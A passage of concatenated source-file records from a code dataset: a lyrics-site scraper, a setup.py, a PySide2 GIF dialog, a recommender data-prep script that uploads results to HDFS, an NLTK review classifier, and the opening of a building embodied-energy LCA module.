all_lyrics_index.append(f'https://www.eurobeat-prime.com/lyrics.php?artist={chr(letter)}')\r\n\r\n\r\n# Минаваме през всички страници и записваме файл с имена и линкове за всички песни:\r\nwith open('all_songs.txt', 'w') as outfile:\r\n for page in all_lyrics_index:\r\n html_page = urllib.request.urlopen(page)\r\n soup = BeautifulSoup(html_page, 'html.parser')\r\n print(soup.findAll(\"div\", class_=\"mmids\"), file=outfile)\r\n\r\n\r\n# Обработка на информацията от файла - премахваме излишни неща, пълним отделни променливи за име на изпълнител, име на песен, линк и\r\n# ID (което взимаме от ID-то от линка с текста на песента).\r\n# Пълним списък от списъци с необходимата ни информация\r\nartist_song_list_raw = [[] for _ in range(10000)] # тук дефинирам някаква голяма бройка списъци съдържащи се в основния списък, за да съм сигурен, че няма да ми даде out of range. Списъка на песни е повече от два пъти по-малко.\r\nline_number = 0\r\nwith open('all_songs.txt') as input_file:\r\n for line in input_file:\r\n if line != '[
\\n' and line != '
]\\n' and line != '

\\n': # изключва излишни редове\r\n txt = str(line).replace('
', '').replace('
', '').replace('&', '&').replace('#:

', '') # премахва ненужните html елементи\r\n if '' not in txt:\r\n song_id = txt[txt.index('?lyrics=') + 8:txt.index('\">')]\r\n artist_name = txt[:txt.index(' - '):].replace('\\n', '')\r\n lyrics_link = 'https://www.eurobeat-prime.com/lyrics.php?lyrics=' + song_id\r\n artist_song_list_raw[line_number].append(str(artist_name) + ' - ' + str(song_name))\r\n artist_song_list_raw[line_number].append(song_id)\r\n artist_song_list_raw[line_number].append(artist_name)\r\n artist_song_list_raw[line_number].append(song_name)\r\n artist_song_list_raw[line_number].append(lyrics_link)\r\n artist_song_list_raw[line_number].append('https://www.youtube.com/results?search_query=' + artist_name.replace(' ', '+').replace('&', 'and') + '+-+' + song_name.replace(' ', '+').replace('&', 'and'))\r\n line_number += 1\r\n\r\n\r\n# Изчиствам си празните списъци от списъка с данни\r\nartist_song_list = list()\r\nfor lst in range(len(artist_song_list_raw)):\r\n if len(artist_song_list_raw[lst]) > 0:\r\n artist_song_list.append(artist_song_list_raw[lst])\r\n\r\n\r\n# Изтривам ненужния all_songs.txt\r\nos.remove(\"all_songs.txt\")\r\n\r\n","sub_path":"get_titles_and_links.py","file_name":"get_titles_and_links.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"131679238","text":"from setuptools import setup, find_packages # type: ignore\n\n\ndef main():\n pkg = 'ghexport'\n pkgs = find_packages('src')\n return setup(\n name=pkg,\n zip_safe=False,\n packages=pkgs,\n package_dir={'': 'src'},\n package_data={pkg: ['py.typed']},\n\n url='',\n author='',\n author_email='',\n description='',\n\n install_requires=[\n 'pytz',\n 'PyGithub',\n ],\n extras_require={\n 'testing': ['pytest'],\n 'linting': ['pytest', 'mypy'],\n },\n )\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"585095176","text":"#!/usr/bin/env python3\nfrom PySide2.QtCore import *\nfrom PySide2.QtGui import QMovie\nfrom PySide2.QtWidgets import *\n\n\nclass ImagePlayerDialog(QDialog):\n def __init__(self, filename, parent=None):\n super(ImagePlayerDialog, self).__init__(parent=parent)\n # Load the file into a QMovie\n self.setWindowFlags(Qt.FramelessWindowHint)\n self.setAttribute(Qt.WA_NoSystemBackground, True)\n self.setAttribute(Qt.WA_TranslucentBackground, True)\n self.movie = QMovie(filename, QByteArray(), self)\n size = self.movie.scaledSize()\n self.movie_screen = QLabel()\n # Make label fit the gif\n self.movie_screen.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)\n self.movie_screen.setAlignment(Qt.AlignCenter)\n\n # Create the layout\n main_layout = QVBoxLayout()\n main_layout.addWidget(self.movie_screen)\n\n self.setLayout(main_layout)\n\n # Add the QMovie object to the label\n self.movie.setCacheMode(QMovie.CacheAll)\n self.movie.setSpeed(100)\n self.movie_screen.setMovie(self.movie)\n self.__time_out_timer = QTimer()\n self.__time_out_timer.timeout.connect(lambda :self.accept())\n self.__time_out_timer.setSingleShot(True)\n self.__time_out_timer.start(2000)\n self.movie.start()\n self.setMinimumSize(500, 500)\n\n","sub_path":"view_managers/gif_player_dialog.py","file_name":"gif_player_dialog.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"288437553","text":"# -*- coding: utf-8 -*-\r\nimport pandas as pd\r\nimport numpy as np\r\nimport json\r\nimport os\r\nimport codecs\r\nimport pickle as pk\r\nimport argparse\r\nimport warnings\r\nimport logging\r\n\r\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s-[%(levelname)s]: - %(message)s')\r\nlogger = logging.getLogger(__name__)\r\n\r\nlogger.info('[AI-MAP] GenDfmSampleNormal')\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--input0', type=str)\r\nparser.add_argument('--input1', type=str)\r\nparser.add_argument('--input2', type=str)\r\nparser.add_argument('--input3', type=str)\r\nparser.add_argument('--input4', type=str)\r\nparser.add_argument('--input5', type=str)\r\nparser.add_argument('--input6', type=str)\r\nparser.add_argument('--input7', type=str)\r\nparser.add_argument('--input8', type=str)\r\nparser.add_argument('--input9', type=str)\r\nparser.add_argument('--input10', type=str)\r\nparser.add_argument('--input11', type=str)\r\n\r\nparser.add_argument('--output0', type=str)\r\n\r\ninfo = parser.parse_args()\r\nrun_flag = info.input0\r\ntrain_sample_path = info.input1\r\nclient_feas_col_path = info.input2\r\nprdt_feas_col_path = info.input3\r\nclient_feas_col_number_path = info.input4\r\nmean_std_path = info.input5\r\ndiscrete_path = info.input6\r\nquantile_path = info.input7\r\ntrain_flag = info.input8\r\nnumber_flag = info.input9\r\nresult_train_sample_path = info.input10\r\nkeytab_file = info.input11\r\n\r\nresult_flag = info.output0\r\n\r\ntry:\r\n train_flag = int(train_flag)\r\nexcept:\r\n logger.warning(\"[AI-MAP]-param:train_flag transition failed,use default value:1\")\r\n train_flag = 1\r\n\r\ntry:\r\n number_flag = int(number_flag)\r\nexcept:\r\n logger.warning(\"[AI-MAP]-param:number_flag transition failed,use default value:1\")\r\n number_flag = 1\r\n\r\nlogger.info('[AI-MAP]-train_sample_path: %s' % train_sample_path)\r\nlogger.info('[AI-MAP]-client_feas_col_path: %s' % client_feas_col_path)\r\nlogger.info('[AI-MAP]-prdt_feas_col_path: %s' % prdt_feas_col_path)\r\nlogger.info('[AI-MAP]-client_feas_col_number_path: %s' % client_feas_col_number_path)\r\nlogger.info('[AI-MAP]-mean_std_path: %s' % mean_std_path)\r\nlogger.info('[AI-MAP]-discrete_path: %s' % discrete_path)\r\nlogger.info('[AI-MAP]-quantile_path: %s' % quantile_path)\r\nlogger.info('[AI-MAP]-train_flag: %s' % train_flag)\r\nlogger.info('[AI-MAP]-number_flag: %s' % number_flag)\r\nlogger.info('[AI-MAP]-result_train_sample_path: %s' % result_train_sample_path)\r\nlogger.info('[AI-MAP]-kerberos_file: %s' % keytab_file)\r\n\r\n# local_file 类型:string 默认值:无 说明: 训练数据拉取到本地的地址\r\n# hdfs_path 类型:string 默认值:None 说明: 训练数据在hdfs上面的地址\r\n# user_cols_file 类型: string 默认值:无 说明: 客户特征文件\r\n# prdt_cols_file 类型:string 默认值:无 说明: 产品特征文件\r\n# user_number_feas_file 类型:string 默认值:无 说明:客户数值型特征文件\r\n# mean_std_path 类型: string 默认值:无 说明:mean_std文件\r\n# discrete_path 类型: string 默认值:无 说明:discrete文件\r\n# train_flag 类型: string 默认值:1 说明:数据的格式\r\n# number_flag 类型: string 默认值:1 说明:数值类型的特征处理方式\r\n# result_train_sample_path 结果文件存放地址\r\n# keytab_file 类型:string 默认值:无 说明:kerberos认证用户的秘钥\r\n\r\nuser_columns = pd.read_csv(client_feas_col_path, header=None, sep=\"\\t\")\r\nuser_columns = np.array(user_columns).tolist()[0]\r\nprint('user_columns', len(user_columns))\r\n\r\nfund_columns = pd.read_csv(prdt_feas_col_path, header=None, sep=\"\\t\")\r\nfund_columns = np.array(fund_columns).tolist()[0]\r\nprint('fund_columns', len(fund_columns))\r\n\r\nuser_and_fund_columns = user_columns + fund_columns\r\nindex_columns = [c + \"-index\" for c in user_and_fund_columns]\r\nvalue_columns = [c + \"-value\" for c in user_and_fund_columns]\r\nall_total_columns = ['label']\r\nall_total_columns.extend(user_and_fund_columns)\r\n\r\nnumber_columns = pd.read_csv(client_feas_col_number_path, header=None)\r\nnumber_columns = np.array(number_columns).tolist()\r\nnumber_columns = [item[0] for item in number_columns]\r\n# fund number columns\r\nnumber_columns.extend(['nav_total', 'issuevol'])\r\nprint('-----------number columns-------')\r\nprint(number_columns)\r\nprint(len(number_columns))\r\n\r\n# 此函数没有用过\r\ndef birth_handle(item):\r\n if item is not None and item != 'None' and len(item.strip()) == 4:\r\n return item.strip()\r\n else:\r\n result = 1960 if item is None or item == 'None' else int(item) / 10000\r\n return str(int(result))\r\n\r\n\r\ndef none2zero(item):\r\n return '0' if item is None or item == 'None' else item.strip()\r\n\r\n\r\ndef get_data(col_names):\r\n \"\"\"\r\n Get data from local_file,if hdfs_path is not None, get data from HDFS file.\r\n :param col_names:\r\n :return:\r\n \"\"\"\r\n try:\r\n logger.info(\"[AI-MAP]- read data and do some transformation\")\r\n # train_sample_path\r\n data = pd.read_csv(train_sample_path, header=None, names=col_names, sep='\\t', dtype='str')\r\n print(data.shape)\r\n print(data.head(5))\r\n print('-------------col names------------')\r\n print(col_names)\r\n print(len(col_names))\r\n\r\n # transform the None to 0, and transform the data type\r\n count = 0\r\n tot_count = len(col_names)\r\n for column in data.columns:\r\n count += 1\r\n print('%s : %d - %d' % (column, count, tot_count))\r\n data[column] = data[column].apply(none2zero)\r\n if column in number_columns:\r\n data[column] = data[column].astype('float32')\r\n\r\n return data\r\n except:\r\n raise Exception(\"[ERROR]-[AI-MAP]: GenDfmSample Module Execute Failed!\")\r\n\r\n\r\ndef __do_discrete(data, values):\r\n \"\"\"\r\n do discretion\r\n :param data:\r\n :param values:\r\n :return:\r\n \"\"\"\r\n try:\r\n # 异常值处理为0\r\n if values:\r\n logger.info(\"[AI-MAP]- handle the exception data\")\r\n for key in values.keys():\r\n data[key] = data[key].apply(lambda x: x if x in values[key] else '0')\r\n else:\r\n logger.info(\"[AI-MAP]- Non-numerical feature do not exist\")\r\n\r\n logger.info(\"[AI-MAP]- feature one-hot\")\r\n pos = 0\r\n feature_size = 0\r\n for column in user_and_fund_columns:\r\n print('col = %s' % column)\r\n # 数值型,保存下标索引和值\r\n if column in number_columns:\r\n if 2 == number_flag:\r\n print('quantile_trans start')\r\n with codecs.open(quantile_path, 'r', encoding=\"utf-8\") as f:\r\n quantile = json.load(f)\r\n data[column + \"-index\"] = data[column].apply(__num_dis, args=[quantile[column], pos])\r\n data[column + \"-value\"] = 1\r\n pos += 4\r\n feature_size += 4\r\n else:\r\n data[column + \"-index\"] = pos\r\n data[column + \"-value\"] = data[column]\r\n pos += 1\r\n feature_size += 1\r\n else:\r\n # 枚举型,one-hot编码,只存储有值的部分\r\n data[column + \"-index\"] = data[column].apply(lambda x: values[column].index(x) + pos)\r\n data[column + \"-value\"] = 1\r\n pos += len(values[column])\r\n feature_size += len(values[column])\r\n data = data.drop(column, axis=1) # 删除列\r\n numeric_cols = list(set(data.columns) - set(['client_id', 'prdt_code']))\r\n data[numeric_cols] = data[numeric_cols].apply(pd.to_numeric, downcast=\"unsigned\")\r\n return data, feature_size\r\n except:\r\n raise Exception(\"[ERROR]-[AI-MAP]: GenDfmSampleNormal Module Execute Failed!\")\r\n\r\n\r\ndef gen_dfm_sample():\r\n \"\"\"\r\n generate the DFM train or test samples\r\n :return:\r\n \"\"\"\r\n try:\r\n if train_flag == 1:\r\n columns = all_total_columns\r\n else:\r\n columns = ['client_id', 'prdt_code']\r\n columns.extend(all_total_columns)\r\n\r\n data = get_data(columns)\r\n\r\n # z-score normalization\r\n if 1 == number_flag:\r\n print('mean_std_trans start')\r\n with codecs.open(mean_std_path, 'r', encoding=\"utf-8\") as f:\r\n mean_std = json.load(f)\r\n if mean_std:\r\n for c in number_columns:\r\n data[c] = (data[c] - mean_std[c][0]) / mean_std[c][1]\r\n else:\r\n logger.info(\"[AI-MAP]- mean_std not exist\")\r\n\r\n print(\"one-hot encoding start\")\r\n with codecs.open(discrete_path, 'r', encoding=\"utf-8\") as f:\r\n values = json.load(f)\r\n data, feature_size = __do_discrete(data, values)\r\n\r\n logger.info(\"[AI-MAP]- save pkl file\")\r\n # result_file = \"dfm_train_sample\"\r\n result_file_name = train_sample_path.split('/')[-1].replace('sample', 'dfm_sample')\r\n f = open(result_file_name, 'wb')\r\n pk.dump((index_columns, value_columns, feature_size, data), f, 2)\r\n f.close()\r\n\r\n with open(result_flag, 'w') as f_r:\r\n f_r.write('True')\r\n f_r.close()\r\n\r\n # 上传到指定hdfs地址\r\n command = 'export HADOOP_USER_NAME=u006586;hadoop fs -rm %s' % result_train_sample_path + result_file_name\r\n print(command)\r\n os.system(command)\r\n command = 'export HADOOP_USER_NAME=u006586;hadoop fs -put %s %s' % (result_file_name, result_train_sample_path)\r\n print(command)\r\n cmd_status = os.system(command)\r\n if cmd_status != 0:\r\n raise Exception(\"COMMAND : %s \" % command, \"FAILED!!!\")\r\n except:\r\n raise Exception(\"[ERROR]-[AI-MAP]: GenDfmSampleNormal Module Execute Failed!\")\r\n\r\n\r\ndef __num_dis(item, *args):\r\n \"\"\"\r\n :param item: data\r\n :param args: The quartile of a column of data\r\n :return: pos: The result of data discretization\r\n \"\"\"\r\n quantile_col = args[0]\r\n pos = args[1]\r\n if item > quantile_col[2]:\r\n return 3 + pos\r\n elif item > quantile_col[1]:\r\n return 2 + pos\r\n elif item > quantile_col[0]:\r\n return 1 + pos\r\n else:\r\n return pos\r\n\r\nif __name__ == '__main__':\r\n logger.info(\"[AI-MAP]-START GenDfmSampleNormal Module!\")\r\n print(os.listdir('.'))\r\n # kerberos authentication\r\n # keytab = keytab_file.strip('\\n').strip().split('/')[-1]\r\n user = keytab_file.strip('\\n').strip().split('/')[-1].split('.')[0]\r\n command = \"kinit -kt %s %s\" % (keytab_file, user)\r\n print(command)\r\n cmd_status = os.system(command)\r\n if cmd_status != 0:\r\n raise Exception(\"COMMAND : %s \" % command, \"FAILED!!!\")\r\n gen_dfm_sample()\r\n logger.info(\"[AI-MAP]-END GenDfmSampleNormal Module!\")","sub_path":"recommendation/genDfmNormalSample/genDfmNormalSample.py","file_name":"genDfmNormalSample.py","file_ext":"py","file_size_in_byte":10883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"120666064","text":"import re, nltk, random, sys\nimport word_category_counter\nfrom nltk import bigrams\n\nselected_features = None\n\ndef get_score(review):\n return int(re.search(r'Overall = ([1-5])', review).group(1))\n\ndef get_text(review):\n return re.search(r'Text = \"(.*)\"', review).group(1)\n\t\t\n# Write to File, this function is just for reference, because the encoding matters.\ndef write_file(file_name, data):\n file = open(file_name, 'w', encoding=\"utf-8\") # or you can say encoding=\"latin1\"\n file.write(data)\n file.close()\n\ndef process_reviews(file_name):\n file = open(file_name, \"rb\")\n raw_data = file.read().decode(\"latin1\")\n file.close()\n \n stopwords = nltk.corpus.stopwords.words(\"english\")\n np = r\"(\\w)\"\n\n texts = []\n for review in re.split(r'\\.\\n', raw_data):\n overall_score = get_score(review)\n review_text = get_text(review)\n if overall_score > 3:\n score = \"positive\"\n else: \n \tscore = \"negative\"\n \t\n words = nltk.word_tokenize(review_text)\n flat_words = [word.lower() for word in words]\n #print(flat_words)\n content = []\n for t in flat_words:\n \tif t not in stopwords:\n \t\tcontent.append(t)\n #print(content)\n content_w = []\n for t in content:\n \tresult = re.search(np, t)\n \tif result != None:\n \t\tcontent_w.append(t)\n \t \n item = (review_text, content_w, score)\n texts.append(item)\n \n return texts\n \t\t\n# Write to File, this function is just for reference, because the encoding matters.\ndef write_file(file_name, data):\n file = open(file_name, 'w', encoding=\"utf-8\") # or you can say encoding=\"latin1\"\n file.write(data)\n file.close()\n\n# Adds unigram based lexical features\ndef add_lexical_features(fdist, bidist, feature_vector, text):\n\ttext_t = nltk.word_tokenize(text)\n\ttext_nl = nltk.Text(text_t)\n\ttext_len = len(text_nl)\n\t\n\t#unigram features\n\tfor word, freq in fdist.items(): # fdist = nltk.FreqDist(review_words)\n\t\tfname = \"UNI_\" + word\n \n # If we haven't selected any features yet then add the feature to\n # our feature vector\n # Otherwise make sure the feature is one of the ones we want\n # Note we use a Set for the selected features for O(1) lookup\n\t\tif selected_features == None or fname in selected_features:\n #feature_vector[fname] = 1 \n\t\t\t#num_of_w = text_nl.count(word)\n\t\t\tfeature_vector[fname] = fdist.freq(word)\n\t\n\t#let's add a new feature \"len of text\"\n\tfname = \"text_len\"\n\tfeature_vector[fname] = text_len\n\t\n\t#bigram features\n\tfor word, freq in bidist.items(): # fdist = nltk.FreqDist(review_words)\n\t\tfname = \"BIGRAM_\" + word[0] + \"_\" + word[1]\n\t\tif selected_features == None or fname in selected_features:\n\t\t\t#feature_vector[fname] = 1 \n\t\t\t#num_of_w = text_nl.count(word)\n\t\t\tfeature_vector[fname] = bidist.freq(word)\n\t\n\ttol_text = nltk.pos_tag(text_t)\n\t\n\t#unigram part-of-speech features\n\tfdist_pos = nltk.FreqDist(tag for (word, tag) in tol_text)\n\tfor word, freq in fdist_pos.items(): \n\t\tfname = \"UNIPOS_\" + word\n\t\tif selected_features == None or fname in selected_features:\n #feature_vector[fname] = 1 \n\t\t\t#num_of_w = text_nl.count(word)\n\t\t\tfeature_vector[fname] = fdist_pos.freq(word)\n\t\t\n\tmy_bigrams_pos = list(bigrams(tol_text))\n\t#to create a list of bigram's part-of-speech \n\tbi_part_of_speach = []\n\tfor item in my_bigrams_pos:\n\t\ta = (item[0][1], item[1][1])\n\t\tbi_part_of_speach.append(a)\n\t\n\tbidist_pos = nltk.FreqDist(bi_part_of_speach)\n\tfor word, freq in bidist_pos.items(): \n\t\tfname = \"BIPOS_\" + word[0] + \"_\" + word[1]\n\t\tif selected_features == None or fname in selected_features:\n\t\t\tfeature_vector[fname] = bidist_pos.freq(word)\n\t\t\t\n# Adds a simple LIWC derived feature\ndef add_liwc_features(text, feature_vector):\n liwc_scores = word_category_counter.score_text(text)\n \n negative_score = liwc_scores[\"Negative Emotion\"]\n positive_score = liwc_scores[\"Positive Emotion\"]\n\n if positive_score > negative_score:\n feature_vector[\"liwc:positive\"] = 1\n else:\n feature_vector[\"liwc:negative\"] = 1\n \n# Adds all our features and returns the vector\ndef features(review_text, review_words):\n feature_vector = {}\n\n uni_dist = nltk.FreqDist(review_words)\n \n my_bigrams = list(bigrams(review_words))\n bi_dist = nltk.FreqDist(my_bigrams)\n \n add_lexical_features(uni_dist, bi_dist, feature_vector, review_text)\n add_liwc_features(review_text, feature_vector)\n return feature_vector\n\n#python3 DT_baseline_train.py restaurant-training.data\nif __name__ == '__main__':\n file_name = sys.argv[1]\n texts = process_reviews(file_name)\n \n # Make sure we split the same way every time for the live coding\n random.seed(0)\n \n # Make sure to randomize the reviews first!\n random.shuffle(texts)\n \n # Convert the data into feature vectors\n featuresets = [\n (features(review_text, review_words), label) \n for (review_text, review_words, label) in texts\n ]\n \t\n # Train on the training data\n classifier = nltk.classify.DecisionTreeClassifier.train(featuresets, entropy_cutoff=0, support_cutoff=0)\n \n import pickle\n f = open(\"dt−classifier.pickle\", \"wb\")\n pickle.dump(classifier, f)\n f.close()\n","sub_path":"scripts/webExample.py","file_name":"webExample.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"200849164","text":"\"\"\"\nEmbodied energy and related grey emissions model algorithm\n\"\"\"\nfrom __future__ import division\n\nimport os\nimport numpy as np\nimport pandas as pd\nfrom cea.datamanagement.data_helper import calc_mainuse\nfrom cea.datamanagement.data_helper import calc_category\nfrom cea.utilities.dbf import dbf_to_dataframe\nfrom geopandas import GeoDataFrame as Gdf\nimport cea.globalvar\nimport cea.inputlocator\nimport cea.config\nfrom cea.constants import SERVICE_LIFE_OF_BUILDINGS, SERVICE_LIFE_OF_TECHNICAL_SYSTEMS, CONVERSION_AREA_TO_FLOOR_AREA_RATIO\n\n__author__ = \"Jimeno A. Fonseca\"\n__copyright__ = \"Copyright 2015, Architecture and Building Systems - ETH Zurich\"\n__credits__ = [\"Jimeno A. Fonseca\", \"Martin Mosteiro\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Daren Thomas\"\n__email__ = \"cea@arch.ethz.ch\"\n__status__ = \"Production\"\n\n\ndef lca_embodied(year_to_calculate, locator, config, gv):\n \"\"\"\n Algorithm to calculate the embodied emissions and non-renewable primary energy of buildings according to the method\n of [Fonseca et al., 2015] and [Thoma et al., 2014]. The calculation method assumes a 60 year payoff for the embodied\n energy and emissions of a building, after which both values become zero.\n\n The results are provided in total as well as per square meter:\n\n - embodied non-renewable primary energy: E_nre_pen_GJ and E_nre_pen_MJm2\n - embodied greenhouse gas emissions: E_ghg_ton and E_ghg_kgm2\n\n As part of the algorithm, the following files are read from InputLocator:\n\n - architecture.shp: shapefile with the architecture of each building\n locator.get_building_architecture()\n - occupancy.shp: shapefile with the occupancy types of each building\n locator.get_building_occupancy()\n - age.shp: shapefile with the age and retrofit date of each building\n locator.get_building_age()\n - zone.shp: shapefile with the geometry of each building in the zone of study\n locator.get_zone_geometry()\n - Archetypes_properties: csv file with the database of archetypes including embodied energy and emissions\n locator.get_archetypes_properties()\n\n As a result, the following file is created:\n\n - Total_LCA_embodied: .csv\n csv file of yearly primary energy and grey emissions per building stored in locator.get_lca_embodied()\n\n :param year_to_calculate: year between 1900 and 2100 indicating when embodied energy is evaluated\n to account for emissions already offset from building construction and retrofits more than 60 years ago.\n :type year_to_calculate: int\n :param locator: an instance of InputLocator set to the scenario\n :type locator: InputLocator\n :returns: This function does not return anything\n :rtype: NoneType\n\n .. [Fonseca et al., 2015] Fonseca et al. (2015) \"Assessing the environmental impact of future urban developments at\n neighborhood scale.\" CISBAT 2015.\n .. [Thoma et al., 2014] Thoma et al. (2014). \"Estimation of base-values for grey energy, primary energy, global\n warming potential (GWP 100A) and Umweltbelastungspunkte (UBP 2006) for Swiss constructions from before 1920\n until today.\" CUI 2014.\n\n\n Files read / written from InputLocator:\n\n get_building_architecture\n get_building_occupancy\n get_building_age\n get_zone_geometry\n get_archetypes_embodied_energy\n get_archetypes_embodied_emissions\n\n path_LCA_embodied_energy:\n path to database of archetypes embodied energy file\n Archetypes_embodied_energy.csv\n path_LCA_embodied_emissions:\n path to database of archetypes grey emissions file\n Archetypes_embodied_emissions.csv\n path_age_shp: string\n path to building_age.shp\n path_occupancy_shp:\n path to building_occupancyshp\n path_geometry_shp:\n path to building_geometrys.hp\n path_architecture_shp:\n path to building_architecture.shp\n path_results : string\n path to demand results folder emissions\n \"\"\"\n\n # local variables\n architecture_df = dbf_to_dataframe(locator.get_building_architecture())\n prop_occupancy_df = dbf_to_dataframe(locator.get_building_occupancy())\n occupancy_df = pd.DataFrame(prop_occupancy_df.loc[:, (prop_occupancy_df != 0).any(axis=0)])\n age_df = dbf_to_dataframe(locator.get_building_age())\n geometry_df = Gdf.from_file(locator.get_zone_geometry())\n geometry_df['footprint'] = geometry_df.area\n geometry_df['perimeter'] = geometry_df.length\n geometry_df = geometry_df.drop('geometry', axis=1)\n\n # get list of uses\n list_uses = list(occupancy_df.drop({'Name'}, axis=1).columns)\n\n # define main use:\n occupancy_df['mainuse'] = calc_mainuse(occupancy_df, list_uses)\n\n # DataFrame with joined data for all categories\n cat_df = occupancy_df.merge(age_df, on='Name').merge(geometry_df, on='Name').merge(architecture_df, on='Name')\n\n # calculate building geometry\n ## total window area\n\n average_wwr = [np.mean([a,b,c,d]) for a,b,c,d in zip(cat_df['wwr_south'],cat_df['wwr_north'],cat_df['wwr_west'],cat_df['wwr_east'])]\n cat_df['windows_ag'] = average_wwr * cat_df['perimeter'] * (cat_df['height_ag'] * (1-cat_df['void_deck']))\n ## wall area above ground\n cat_df['area_walls_ext_ag'] = cat_df['perimeter'] * (cat_df['height_ag'] * (1-cat_df['void_deck'])) - cat_df['windows_ag']\n ## wall area below ground\n cat_df['area_walls_ext_bg'] = cat_df['perimeter'] * cat_df['height_bg']\n ## floor area above ground\n cat_df['floor_area_ag'] = cat_df['footprint'] * cat_df['floors_ag']\n ## floor area below ground\n cat_df['floor_area_bg'] = cat_df['footprint'] * cat_df['floors_bg']\n ## total floor area\n cat_df['total_area'] = cat_df['floor_area_ag'] + cat_df['floor_area_bg']\n\n # get categories for each year of construction/retrofit\n ## each building component gets categorized according to its occupancy type, construction year and retrofit year\n ## e.g., for an office building built in 1975, cat_df['cat_built'] = 'OFFICE3'\n ## e.g., for an office building with windows renovated in 1975, cat_df['cat_windows'] = 'OFFICE9'\n\n\n # calculate contributions to embodied energy and emissions\n ## calculated by multiplying the area of the given component by the energy and emissions per square meter for the\n ## given category according to the data in the archetype database\n result_energy = calculate_contributions('EMBODIED_ENERGY', cat_df, config, gv, locator, year_to_calculate,\n total_column='GEN_GJ', specific_column='GEN_MJm2')\n result_emissions = calculate_contributions('EMBODIED_EMISSIONS', cat_df, config, gv, locator, year_to_calculate,\n total_column='CO2_ton', specific_column='CO2_kgm2')\n\n # export the results for embodied emissions (E_ghg_) and non-renewable primary energy (E_nre_pen_) for each\n # building, both total (in t CO2-eq. and GJ) and per square meter (in kg CO2-eq./m2 and MJ/m2)\n fields_to_plot = ['Name', 'GFA_m2', 'E_nre_pen_GJ', 'E_nre_pen_MJm2', 'E_ghg_ton', 'E_ghg_kgm2']\n pd.DataFrame(\n {'Name': result_energy.Name, 'E_nre_pen_GJ': result_energy.GEN_GJ, 'E_nre_pen_MJm2': result_energy.GEN_MJm2,\n 'E_ghg_ton': result_emissions.CO2_ton, 'E_ghg_kgm2': result_emissions.CO2_kgm2,\n 'GFA_m2': result_energy.total_area}).to_csv(locator.get_lca_embodied(),\n columns=fields_to_plot, index=False, float_format='%.2f')\n print('done!')\n\n\ndef calculate_contributions(archetype, cat_df, config, gv, locator, year_to_calculate, total_column, specific_column):\n \"\"\"\n Calculate the embodied energy/emissions for each building based on their construction year, and the area and \n renovation year of each building component.\n\n :param archetype: String that defines whether the 'EMBODIED_ENERGY' or 'EMBODIED_EMISSIONS' are being calculated.\n :type archetype: str\n :param cat_df: DataFrame with joined data of all categories for each building, that is: occupancy, age, geometry,\n architecture, building component area, construction category and renovation category for each building component\n :type cat_df: DataFrame\n :param gv: an instance of GlobalVariables with the constants to be used (like `list_uses` etc.)\n :type gv: GlobalVariables\n :param locator: an InputLocator instance set to the scenario to work on\n :type locator: InputLocator\n :param year_to_calculate: year in which the calculation is done; since the embodied energy and emissions are\n calculated over 60 years, if the year of calculation is more than 60 years after construction, the results\n will be 0\n :type year_to_calculate: int\n :param total_column: label for the column with the total results (e.g., 'GEN_GJ')\n :type total_column: str\n :param specific_column: label for the column with the results per square meter (e.g., 'GEN_MJm2')\n :type specific_column: str\n\n :return result: DataFrame with the calculation results (i.e., the total and specific embodied energy or emisisons\n for each building)\n :rtype result: DataFrame\n \"\"\"\n # get archetype properties from the database\n database_df = pd.read_excel(locator.get_life_cycle_inventory_building_systems(config.region), archetype)\n database_df['Code'] = database_df.apply(lambda x: calc_code(x['building_use'], x['year_start'],\n x['year_end'], x['standard']), axis=1)\n\n cat_df['cat_built'] = calc_category(database_df, cat_df, 'built', 'C')\n\n retro_cat = ['envelope', 'roof', 'windows', 'partitions', 'basement', 'HVAC']\n for cat in retro_cat:\n cat_df['cat_' + cat] = calc_category(database_df, cat_df, cat, 'R')\n\n # merge databases according to category\n built_df = cat_df.merge(database_df, left_on='cat_built', right_on='Code')\n envelope_df = cat_df.merge(database_df, left_on='cat_envelope', right_on='Code')\n roof_df = cat_df.merge(database_df, left_on='cat_roof', right_on='Code')\n windows_df = cat_df.merge(database_df, left_on='cat_windows', right_on='Code')\n partitions_df = cat_df.merge(database_df, left_on='cat_partitions', right_on='Code')\n basement_df = cat_df.merge(database_df, left_on='cat_basement', right_on='Code')\n HVAC_df = cat_df.merge(database_df, left_on='cat_HVAC', right_on='Code')\n\n #do checkup in case some buildings or all buildings do not have a match.\n #this happens when building has not been retrofitted.\n\n \n # calculate the embodied energy/emissions due to construction\n # these include: external walls, roof, windows, interior floors, partitions, HVAC systems, and excavation\n ## calculate how many years before the calculation year the building was built in\n built_df['delta_year'] = year_to_calculate - built_df['built']\n ## if it was built more than 60 years before, the embodied energy/emissions have been \"paid off\" and are set to 0\n built_df['confirm'] = built_df.apply(lambda x: calc_if_existing(x['delta_year'], SERVICE_LIFE_OF_BUILDINGS), axis=1)\n ## if it was built less than 60 years before, the contribution from each building component is calculated\n built_df['contrib'] = (((built_df['Wall_ext_ag'] * built_df['area_walls_ext_ag']) +\n (built_df['Roof'] * built_df['footprint']) +\n (built_df['windows_ag'] * built_df['Win_ext']) +\n (built_df['floor_area_ag'] * built_df['Floor_int'] +\n built_df['floor_area_ag'] * built_df['Wall_int_sup'] * CONVERSION_AREA_TO_FLOOR_AREA_RATIO +\n built_df['footprint'] * built_df['Wall_int_nosup'] * CONVERSION_AREA_TO_FLOOR_AREA_RATIO) +\n (basement_df['footprint'] * basement_df['Floor_g'] +\n basement_df['Wall_ext_bg'] * basement_df['area_walls_ext_bg']) +\n (built_df['footprint'] * built_df['Excavation'])) 